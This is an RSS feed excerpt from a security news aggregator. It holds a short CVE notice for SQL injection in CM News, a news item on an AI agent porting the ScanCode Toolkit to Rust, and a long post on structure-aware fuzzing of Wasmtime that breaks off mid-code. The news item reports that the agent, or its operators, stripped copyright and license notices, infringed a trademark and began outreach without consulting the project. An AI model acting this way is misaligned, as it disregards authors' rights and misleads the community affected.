<title><![CDATA[CVE-2024-12016 | CM Informatics CM News up to 6.0 sql injection]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in CM Informatics CM News up to 6.0. Affected by this issue is some unknown functionality. Such manipulation leads to sql injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerabili...]]></description>
<link>https://tsecurity.de/de/3565303/sicherheitsluecken/cve-2024-12016-cm-informatics-cm-news-up-to-60-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565303/sicherheitsluecken/cve-2024-12016-cm-informatics-cm-news-up-to-60-sql-injection/</guid>
<pubDate>Tue, 02 Jun 2026 10:08:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/cm_informatics:cm_news">CM Informatics CM News up to 6.0</a>. Affected by this issue is some unknown functionality. Such manipulation leads to sql injection. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2024-12016">CVE-2024-12016</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ombredanne: An AI agent ported our codebase from Python to Rust]]></title>
<description><![CDATA[Over on the AboutCode blog, lead
maintainer Philippe Ombredanne writes
about an agentic LLM system porting the ScanCode
Toolkit to Rust.  In the process, the LLM (or the people behind it)
infringed the ScanCode trademark, stripped copyright and license notices,
"and started an outreach campaign, ...]]></description>
<link>https://tsecurity.de/de/3564360/linux-tipps/ombredanne-an-ai-agent-ported-our-codebase-from-python-to-rust/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3564360/linux-tipps/ombredanne-an-ai-agent-ported-our-codebase-from-python-to-rust/</guid>
<pubDate>Mon, 01 Jun 2026 23:24:24 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Over on the <a href="https://www.aboutcode.org/">AboutCode</a> blog, lead
maintainer Philippe Ombredanne <a href="https://www.aboutcode.org/blog/agentic-scancode-port-case-study/">writes</a>
about an agentic LLM system porting the <a href="https://github.com/aboutcode-org/scancode-toolkit#scancode-toolkit">ScanCode
Toolkit</a> to Rust.  In the process, the LLM (or the people behind it)
infringed the ScanCode trademark, stripped copyright and license notices,
"<q>and started an outreach campaign, without ever engaging the AboutCode
community</q>".  Ironically, the toolkit is used to scan source code and binaries in
order to figure out licensing and copyright information; it also reports on
package
dependencies, vulnerabilities, and more.


<blockquote class="bq">
This is worth repeating: A comprehensive test suite, decent documentation, and curated datasets is what makes automated porting possible. It is also what makes a codebase easier to replicate without understanding it.
<p>
The agent's initial approach, using an existing Rust license-detection library, failed to match ScanCode's output quality. The agent then did what any translator would do when a loose paraphrase fails: it copied the original more closely. The final port reproduces ScanCode's core algorithms, code organization, and data-driven architecture in Rust, not because the agent understood them, but because it had enough training data and test feedback to converge on equivalent code.
</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nick Fitzgerald: A Structure-Aware Fuzzing Experiment]]></title>
<description><![CDATA[Structure-aware fuzzing can better exercise the system under test (SUT) by
crafting inputs in the format expected by the SUT, rather than throwing
pseudorandom bytes against it. That is, it avoids “shallow” inputs that the SUT
will reject early (for example, syntactically invalid source text when...]]></description>
<link>https://tsecurity.de/de/3563869/tools/nick-fitzgerald-a-structure-aware-fuzzing-experiment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563869/tools/nick-fitzgerald-a-structure-aware-fuzzing-experiment/</guid>
<pubDate>Mon, 01 Jun 2026 19:24:02 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Structure-aware fuzzing can better exercise the system under test (SUT) by
crafting inputs in the format expected by the SUT, rather than throwing
pseudorandom bytes against it. That is, it avoids “shallow” inputs that the SUT
will reject early (for example, syntactically invalid source text when fuzzing a
programming language’s compiler) and only produces inputs that go “deep” into
the SUT (e.g. programs that type-check and exercise the mid-end optimizer and
backend code generator). The Rust fuzzing ecosystem is largely built around
<a href="https://github.com/rust-fuzz/cargo-fuzz"><code class="language-plaintext highlighter-rouge">cargo-fuzz</code></a> and the <a href="https://github.com/rust-fuzz/libfuzzer"><code class="language-plaintext highlighter-rouge">libfuzzer-sys</code></a> crate, which provides two methods for
structure-aware fuzzing:</p>

<ol>
  <li>
    <p><em>Generating</em> structured inputs from scratch with the <a href="https://github.com/rust-fuzz/arbitrary"><code class="language-plaintext highlighter-rouge">arbitrary</code></a> crate</p>
  </li>
  <li>
    <p><em>Mutating</em> existing inputs from the fuzzer’s corpus in a structure-aware
manner, thereby producing new structured inputs, via the
<a href="https://docs.rs/libfuzzer-sys/0.4.12/libfuzzer_sys/macro.fuzz_mutator.html"><code class="language-plaintext highlighter-rouge">fuzz_mutator!</code></a> hook</p>
  </li>
</ol>

<p>While the two methods are not technically mutually exclusive, combining the two
can be difficult and engineering resources are finite. So:</p>

<blockquote>
  <p><strong><em>If we are only implementing one approach, is generation or mutation better?</em></strong></p>
</blockquote>

<p>To help answer this question, I implemented structure-aware generation and
mutation of guaranteed-valid <a href="https://webassembly.org/">WebAssembly</a> (Wasm) instruction sequences. This
task is small enough to be easily understandable but large enough and real
enough to (hopefully) be representative and applicable to other domains, or, at
the very least, interesting.<sup><a class="footnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fn:applicable" rel="footnote">1</a></sup> To evaluate their effectiveness, I
used <a href="https://wasmtime.dev/">Wasmtime</a> as the SUT, <code class="language-plaintext highlighter-rouge">libfuzzer-sys</code> as the fuzzing engine driving
everything, and then compared code coverage over time when using mutation-based
fuzzing versus generation-based fuzzing.</p>

<p>Additionally, there are many ways we can generate pseudorandom WebAssembly
instruction sequences. In this experiment, I’ve evaluated three methods:</p>

<ol>
  <li>
    <p>Unconstrained instruction sequence generation followed by a fixup pass to
ensure validity</p>
  </li>
  <li>
    <p>Generating valid instructions in a forwards, bottom-up
manner (from operands to operators)</p>
  </li>
  <li>
    <p>Generating valid instructions in a backwards, top-down manner (from operators
to operands)</p>
  </li>
</ol>

<p>In contrast, while there are surely many ways to mutate a given WebAssembly
instruction sequence into a new, valid instruction sequence, I’ve only
implemented one method: perform an arbitrary instruction insertion, deletion, or
replacement, producing a new but probably-invalid instruction sequence, and then
run the same fixup pass mentioned previously to ensure validity. This is the
direct mutation-based equivalent of the first generation-based method.</p>

<p><em>Before continuing further, I want to disclose that I am the author of
<code class="language-plaintext highlighter-rouge">wasm-smith</code> and <code class="language-plaintext highlighter-rouge">mutatis</code>, and a maintainer of Wasmtime, <code class="language-plaintext highlighter-rouge">arbitrary</code>,
<code class="language-plaintext highlighter-rouge">libfuzzer-sys</code>, and <code class="language-plaintext highlighter-rouge">cargo-fuzz</code>. That is, while I am familiar with Wasm,
fuzzing, fuzzing Wasm, and both the <code class="language-plaintext highlighter-rouge">arbitrary</code> and <code class="language-plaintext highlighter-rouge">mutatis</code> crates, I may also
be propagating my own biases into these implementations.</em></p>

<h3>Background</h3>

<h4>Generation-Based and Mutation-Based Fuzzing</h4>

<p>A generation-based fuzzer uses a <em>generator</em> to create a pseudo-random test
cases from scratch, feeds these into the system under test, and reports any
failures to the user:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="n">generation_based_fuzzing</span><span class="o">&lt;</span><span class="n">T</span><span class="o">&gt;</span><span class="p">(</span>
    <span class="c1">// A test-case generator.</span>
    <span class="n">generator</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">Fn</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="n">T</span><span class="p">,</span>
    <span class="c1">// A function to run the system under test with a</span>
    <span class="c1">// generated test case, returning a result that</span>
    <span class="c1">// describes whether the run was successful or</span>
    <span class="c1">// not.</span>
    <span class="n">run_system_under_test</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">Fn</span><span class="p">(</span><span class="o">&amp;</span><span class="n">T</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">FuzzResult</span><span class="p">,</span>
<span class="p">)</span> <span class="p">{</span>
    <span class="k">loop</span> <span class="p">{</span>
        <span class="c1">// Generate an input.</span>
        <span class="k">let</span> <span class="n">input</span> <span class="o">=</span> <span class="nf">generator</span><span class="p">();</span>

        <span class="c1">// Run the input through the system under test.</span>
        <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="nf">run_system_under_test</span><span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">);</span>

        <span class="c1">// If the system crashed, panicked, failed an</span>
        <span class="c1">// assertion, violated an invariant, or etc...</span>
        <span class="c1">// then report that to the user.</span>
        <span class="k">if</span> <span class="k">let</span> <span class="nf">Err</span><span class="p">(</span><span class="n">failure</span><span class="p">)</span> <span class="o">=</span> <span class="n">result</span> <span class="p">{</span>
            <span class="nf">report_to_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">,</span> <span class="n">failure</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On the other hand, mutation-based fuzzers are given an initial corpus of inputs
and create new inputs by mutating existing corpus members. They run each new
input through the SUT, report failures the same as before, and if the new input
was “interesting” (for example, exercised new code paths in the SUT that weren’t
previously covered in any other input’s execution) then the new input is added
into the corpus for use in future test iterations:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="n">mutation_based_fuzzing</span><span class="o">&lt;</span><span class="n">T</span><span class="o">&gt;</span><span class="p">(</span>
    <span class="c1">// A corpus of test cases.</span>
    <span class="n">corpus</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Corpus</span><span class="o">&lt;</span><span class="n">T</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="c1">// A function to pseudo-randomly mutate an existing</span>
    <span class="c1">// input into a new input.</span>
    <span class="n">mutate</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">Fn</span><span class="p">(</span><span class="o">&amp;</span><span class="n">T</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">T</span><span class="p">,</span>
    <span class="c1">// A function to run an input in the system under</span>
    <span class="c1">// test, returning a result that describes whether</span>
    <span class="c1">// the run was successful or not.</span>
    <span class="n">run_system_under_test</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">Fn</span><span class="p">(</span><span class="o">&amp;</span><span class="n">T</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="n">FuzzResult</span><span class="p">,</span>
<span class="p">)</span> <span class="p">{</span>
    <span class="k">loop</span> <span class="p">{</span>
        <span class="c1">// Choose an old test case from the corpus.</span>
        <span class="k">let</span> <span class="n">old_input</span> <span class="o">=</span> <span class="n">corpus</span><span class="nf">.choose_one</span><span class="p">();</span>

        <span class="c1">// Pseudo-randomly mutate that old test case,</span>
        <span class="c1">// creating a new one.</span>
        <span class="k">let</span> <span class="n">input</span> <span class="o">=</span> <span class="nf">mutate</span><span class="p">(</span><span class="n">old_input</span><span class="p">);</span>

        <span class="c1">// Run the input through the system under test.</span>
        <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="nf">run_system_under_test</span><span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">);</span>

        <span class="c1">// If the system crashed, panicked, failed an</span>
        <span class="c1">// assertion, violated an invariant, or etc...</span>
        <span class="c1">// then report that to the user.</span>
        <span class="k">if</span> <span class="k">let</span> <span class="nf">Err</span><span class="p">(</span><span class="n">failure</span><span class="p">)</span> <span class="o">=</span> <span class="n">result</span> <span class="p">{</span>
            <span class="nf">report_to_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">input</span><span class="p">,</span> <span class="n">failure</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// If the input was interesting, for example if</span>
        <span class="c1">// it executed previously-unknown code paths,</span>
        <span class="c1">// then add it into the corpus for use in a</span>
        <span class="c1">// future iteration.</span>
        <span class="k">if</span> <span class="n">result</span><span class="nf">.input_was_interesting</span><span class="p">()</span> <span class="p">{</span>
            <span class="n">corpus</span><span class="nf">.insert</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The two approaches are not mutually exclusive and hybrid generation- and
mutation-based fuzzers exist.</p>

<p>More resources:</p>

<ul>
  <li><a href="https://en.wikipedia.org/wiki/Fuzzing#Reuse_of_existing_input_seeds">Wikipedia’s “Fuzzing” article’s “Reuse of existing input seeds”
section</a></li>
  <li><a href="https://www.fuzzingbook.org/html/MutationFuzzer.html">The Fuzzing Book’s Mutation-Based Fuzzing
chapter</a></li>
  <li><a href="https://fitzgen.com/2020/08/24/writing-a-test-case-generator.html">Writing a Test Case Generator for a Programming
Language</a></li>
</ul>

<h4>Structure-Aware Fuzzing</h4>

<p>Structure-<em>unaware</em> fuzzing will generate pseudorandom byte sequences and pass
them directly to the SUT. If the SUT expects some sort of structured input,
e.g. the source text for a programming language, it is likely that these byte
sequences are invalid and will be rejected early by the SUT’s frontend. For
example, when fuzzing a compiler, the input is rejected as syntactically invalid
by the parser or rejected as semantically invalid by the type checker. This can
be useful when hardening a tokenizer, parser, or type checker, but is less
useful when hunting for misoptimization in the mid-end or bad instruction
encoding in the backend because the inputs are unlikely to make it that far
through the compiler’s pipeline.</p>

<p>Structure-<em>aware</em> fuzzing will produce inputs that match the SUT’s expected
input format. Returning to the compiler-fuzzing example, structure-aware fuzzing
lets us generate valid programs for the compiler, so we can exercise more of the
mid-end and backend, rather than just the frontend.</p>

<p>Structure-aware fuzzing is often generation-based: for example using
<a href="https://www.fuzzingbook.org/html/Grammars.html">grammar-based fuzzing</a> to generate pseudorandom strings from a given language
grammar or language-specific tools like <a href="https://github.com/csmith-project/csmith"><code class="language-plaintext highlighter-rouge">csmith</code></a> and <a href="https://docs.rs/wasm-smith"><code class="language-plaintext highlighter-rouge">wasm-smith</code></a> that
generate C and WebAssembly programs respectively. But structure-aware fuzzing
can also be mutation-based: <a href="https://github.com/llvm/llvm-project/blob/192601e8b3ad8b5f73cf27f2093fef5a8c9f4cb6/compiler-rt/test/fuzzer/CompressedTest.cpp#L33-L59"><code class="language-plaintext highlighter-rouge">libFuzzer</code>’s custom mutator
example</a>
implements a structure-aware mutator for zlib-compressed strings, where the raw
input is decompressed, the decompressed data is mutated, and then the mutated
data is recompressed to provide the new raw input. The mutator is aware of the
SUT’s zlib-compressed input structure.</p>

<p>More resources:</p>

<ul>
  <li><a href="https://en.wikipedia.org/wiki/Fuzzing#Aware_of_input_structure">Wikipedia’s “Fuzzing” article’s “Aware of input structure”
section</a></li>
  <li><a href="https://github.com/google/fuzzing/blob/master/docs/structure-aware-fuzzing.md"><code class="language-plaintext highlighter-rouge">google/fuzzing</code> on structure-aware
fuzzing</a></li>
  <li><a href="https://rust-fuzz.github.io/book/cargo-fuzz/structure-aware-fuzzing.html">The <code class="language-plaintext highlighter-rouge">rust-fuzz</code> book on structure-aware
fuzzing</a></li>
</ul>

<h4>The <code class="language-plaintext highlighter-rouge">arbitrary</code> Crate</h4>

<p>The <a href="https://github.com/rust-fuzz/arbitrary"><code class="language-plaintext highlighter-rouge">arbitrary</code></a> crate helps Rust developers write custom structure-aware
generators for fuzzing. It provides building blocks and abstractions for
translating a raw byte sequence (usually from a fuzzing engine) into a
structured type, effectively interpreting the raw bytes as a “DNA string” or set
of predetermined choices for its decision tree. The library also provides a
<code class="language-plaintext highlighter-rouge">derive(Arbitrary)</code> macro to automatically implement its functionality for a
given type.</p>

<p>Because <code class="language-plaintext highlighter-rouge">arbitrary</code> is effectively implemented by combining decision trees, it
is extremely easy to create imbalanced trees and unintentionally <a href="https://blog.regehr.org/archives/1700">bias the
distribution of generated test cases</a>.</p>

<h4>The <code class="language-plaintext highlighter-rouge">mutatis</code> Crate</h4>

<p>The <a href="https://docs.rs/mutatis"><code class="language-plaintext highlighter-rouge">mutatis</code></a> crate is, at a high-level, performing the same role for
authoring structure-aware mutators that <code class="language-plaintext highlighter-rouge">arbitrary</code> plays for generators. That
is, it provides Rust developers with abstractions and combinators for creating
custom structure-aware mutators. It also provides a <code class="language-plaintext highlighter-rouge">derive(Mutate)</code> macro to
automatically implement its functionality for a given type.</p>

<p><code class="language-plaintext highlighter-rouge">mutatis</code> is designed to resist bias via a two-phase design: first, it
enumerates all of the candidate mutations that could be applied to a test case,
and only afterwards chooses a particular random mutation from the candidate set
to actually apply.</p>

<h4>WebAssembly</h4>

<p><a href="https://webassembly.org/">WebAssembly</a> is a virtual instruction set designed to be safe, portable, and
fast. It is a stack machine where an instruction’s operands are popped off a
stack during execution and results pushed. It has sandboxed linear memories,
global variables, and local variables (the latter two effectively being two
kinds of virtual registers). The following instruction sequence computes <code class="language-plaintext highlighter-rouge">a * 3</code>
and stores the result into memory at address <code class="language-plaintext highlighter-rouge">p</code>:</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">;; []</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">p</span>
<span class="c1">;; [p]</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">a</span>
<span class="c1">;; [p, a]</span>
<span class="nf">i32.const</span> <span class="mi">3</span>
<span class="c1">;; [p, a, 3]</span>
<span class="nf">i32.mul</span>
<span class="c1">;; [p, a*3]</span>
<span class="nf">i32.store</span>
<span class="c1">;; []</span>
</code></pre></div></div>

<h3>Generator and Mutator Implementation</h3>

<p>The range of all three generators and the mutator is the same universe of
WebAssembly programs. They are all implemented on top of the same <code class="language-plaintext highlighter-rouge">Module</code> and
<code class="language-plaintext highlighter-rouge">Inst</code> types, and, given enough time, none is capable of producing an
instruction sequence that another cannot. This helps ensure that our comparison
is apples-to-apples. However, due to their different implementation techniques,
they do produce different distributions of WebAssembly programs within that
universe, and produce test cases at different speeds from one another, which
ultimately affects how efficiently they exercise the SUT.</p>

<p>All of the generators are built on top of the <a href="https://github.com/rust-fuzz/arbitrary"><code class="language-plaintext highlighter-rouge">arbitrary</code></a> crate. The mutator
is built on top of the <a href="https://docs.rs/mutatis"><code class="language-plaintext highlighter-rouge">mutatis</code></a> crate.</p>

<p>The <code class="language-plaintext highlighter-rouge">Module</code> type is our structured fuzzing input. It describes a WebAssembly
module containing a variable number of linear memories, a variable number and
type of globals, and one function with a variable number and type of parameters
and results and a variable instruction sequence:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/// A WebAssembly module of the shape:</span>
<span class="cd">///</span>
<span class="cd">///     (module</span>
<span class="cd">///       (memory ...)</span>
<span class="cd">///       (memory ...)</span>
<span class="cd">///       ...</span>
<span class="cd">///</span>
<span class="cd">///       (global ...)</span>
<span class="cd">///       (global ...)</span>
<span class="cd">///       ...</span>
<span class="cd">///</span>
<span class="cd">///       (func (export "run") (param ...) (result ...)</span>
<span class="cd">///         ...</span>
<span class="cd">///       )</span>
<span class="cd">///     )</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="n">num_memories</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
    <span class="n">globals</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Global</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">param_types</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">result_types</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">instructions</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span><span class="p">,</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">Inst</code> type is an <code class="language-plaintext highlighter-rouge">enum</code> of all the WebAssembly instructions the
implementations support, which is all of the integer, float, SIMD, memory,
local, and global instructions. Control-flow, threading, table, and GC
instructions are not supported. Here is a subset of <code class="language-plaintext highlighter-rouge">Inst</code>’s definition:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/// A WebAssembly instruction.</span>
<span class="k">pub</span> <span class="k">enum</span> <span class="n">Inst</span> <span class="p">{</span>
    <span class="nb">Drop</span><span class="p">,</span>
    <span class="nf">LocalGet</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
    <span class="nf">GlobalGet</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>

    <span class="c1">// ...</span>

    <span class="nf">I32Const</span><span class="p">(</span><span class="nb">i32</span><span class="p">),</span>
    <span class="n">I32Add</span><span class="p">,</span>
    <span class="n">I32Sub</span><span class="p">,</span>
    <span class="n">I32Mul</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="nf">I64Const</span><span class="p">(</span><span class="nb">i64</span><span class="p">),</span>
    <span class="n">I64Add</span><span class="p">,</span>
    <span class="n">I64Sub</span><span class="p">,</span>
    <span class="n">I64Mul</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="nf">F32Const</span><span class="p">(</span><span class="nb">f32</span><span class="p">),</span>
    <span class="n">F32Add</span><span class="p">,</span>
    <span class="n">F32Sub</span><span class="p">,</span>
    <span class="n">F32Mul</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="nf">F64Const</span><span class="p">(</span><span class="nb">f64</span><span class="p">),</span>
    <span class="n">F64Add</span><span class="p">,</span>
    <span class="n">F64Sub</span><span class="p">,</span>
    <span class="n">F64Mul</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="n">I32WrapI64</span><span class="p">,</span>
    <span class="n">I64ExtendI32S</span><span class="p">,</span>
    <span class="n">I64ExtendI32U</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="nf">V128Const</span><span class="p">(</span><span class="nb">i128</span><span class="p">),</span>
    <span class="n">I8x16Add</span><span class="p">,</span>
    <span class="n">I8x16Sub</span><span class="p">,</span>

    <span class="c1">// ...</span>

    <span class="nf">I32Load</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
    <span class="nf">I64Load</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>

    <span class="c1">// ...</span>

    <span class="nf">I32Store</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
    <span class="nf">I64Store</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>

    <span class="c1">// ...</span>

    <span class="nf">MemorySize</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
    <span class="nf">MemoryGrow</span><span class="p">(</span><span class="nb">u32</span><span class="p">),</span>
<span class="p">}</span>
</code></pre></div></div>

<p>There is an <code class="language-plaintext highlighter-rouge">Inst::operand_types</code> method that returns the types that the
instruction pops from the stack, and an <code class="language-plaintext highlighter-rouge">Inst::result_type</code> method that returns
the type of the value that the instruction pushes onto the stack, if
any. Finally, the <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code> method encodes the module into
WebAssembly’s binary format, so it can be fed into Wasmtime. These methods are
used, directly or indirectly, in every generator and mutator implementation.</p>

<h4><code class="language-plaintext highlighter-rouge">arb</code></h4>

<p>The <code class="language-plaintext highlighter-rouge">arb</code> generator leverages <code class="language-plaintext highlighter-rouge">derive(arbitrary::Arbitrary)</code> on our structured
input types to generate a pseudorandom instance of <code class="language-plaintext highlighter-rouge">Module</code>, unconstrained by
validity. The module’s instruction sequence is almost certainly not valid at
this point: it likely is missing operands for instructions, producing more
results than the function’s signature describes, producing results of types that
don’t match the function signature, accessing globals and locals that don’t
exist, etc… Having produced an instance of <code class="language-plaintext highlighter-rouge">Module</code>, it next calls the
<code class="language-plaintext highlighter-rouge">Module::fixup</code> method to mutate the <code class="language-plaintext highlighter-rouge">Module</code> so that it is valid.</p>

<p>The <code class="language-plaintext highlighter-rouge">fixup</code> method works by abstractly interpreting the instruction sequence to
track the types of each value on the stack at every program point. Whenever an
instruction’s operand types don’t match the types on top of the stack, it
generates dummy values of the correct type. When the instructions produce more
values than the function’s signature proscribes, it emits <code class="language-plaintext highlighter-rouge">drop</code> instructions.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">impl</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">fixup</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="k">mut</span> <span class="n">make_value</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">FnMut</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">i64</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// ...</span>

        <span class="c1">// The fixed-up instructions.</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">fixed</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">with_capacity</span><span class="p">(</span>
            <span class="k">self</span><span class="py">.instructions</span><span class="nf">.len</span><span class="p">(),</span>
        <span class="p">);</span>

        <span class="c1">// The types on the stack at any given program</span>
        <span class="c1">// point. Similar to the Wasm spec's appendix's</span>
        <span class="c1">// validation algorithm.</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">stack</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

        <span class="k">for</span> <span class="n">inst</span> <span class="k">in</span> <span class="nn">mem</span><span class="p">::</span><span class="nf">take</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="py">.instructions</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// Special-case `drop` because it is</span>
            <span class="c1">// polymorphic.</span>
            <span class="k">if</span> <span class="nd">matches!</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="nn">Inst</span><span class="p">::</span><span class="nb">Drop</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">if</span> <span class="n">stack</span><span class="nf">.is_empty</span><span class="p">()</span> <span class="p">{</span>
                    <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span>
                        <span class="nn">ValType</span><span class="p">::</span><span class="n">I32</span><span class="nf">.make_const</span><span class="p">(</span><span class="nf">make_value</span><span class="p">()),</span>
                    <span class="p">);</span>
                <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                    <span class="n">stack</span><span class="nf">.pop</span><span class="p">();</span>
                <span class="p">}</span>
                <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span><span class="n">inst</span><span class="p">);</span>
                <span class="k">continue</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// First clamp entity indices to valid</span>
            <span class="c1">// ranges.</span>
            <span class="k">let</span> <span class="nf">Some</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span> <span class="o">=</span> <span class="k">self</span><span class="nf">.fixup_inst_immediates</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">make_value</span><span class="p">,</span>
                <span class="n">has_mutable_global</span><span class="p">,</span>
                <span class="n">inst</span><span class="p">,</span>
            <span class="p">)</span> <span class="k">else</span> <span class="p">{</span>
                <span class="k">continue</span>
            <span class="p">};</span>

            <span class="c1">// Then make sure that the stack has</span>
            <span class="c1">// operands of the correct types for this</span>
            <span class="c1">// instruction.</span>
            <span class="k">self</span><span class="nf">.fixup_stack</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">make_value</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">fixed</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">inst</span><span class="p">,</span>
            <span class="p">);</span>

            <span class="c1">// Finally, apply the effects to the stack.</span>
            <span class="k">let</span> <span class="n">len_operands</span> <span class="o">=</span> <span class="n">inst</span><span class="nf">.operand_types</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="k">self</span><span class="py">.globals</span><span class="p">,</span>
            <span class="p">)</span><span class="nf">.len</span><span class="p">();</span>
            <span class="n">stack</span><span class="nf">.truncate</span><span class="p">(</span><span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="n">len_operands</span><span class="p">);</span>
            <span class="n">stack</span><span class="nf">.extend</span><span class="p">(</span><span class="n">inst</span><span class="nf">.result_type</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="k">self</span><span class="py">.param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="k">self</span><span class="py">.globals</span><span class="p">,</span>
            <span class="p">));</span>

            <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span><span class="n">inst</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// ...</span>

        <span class="k">self</span><span class="py">.instructions</span> <span class="o">=</span> <span class="n">fixed</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">fn</span> <span class="nf">fixup_stack</span><span class="p">(</span>
        <span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span>
        <span class="k">mut</span> <span class="n">make_value</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">FnMut</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">i64</span><span class="p">,</span>
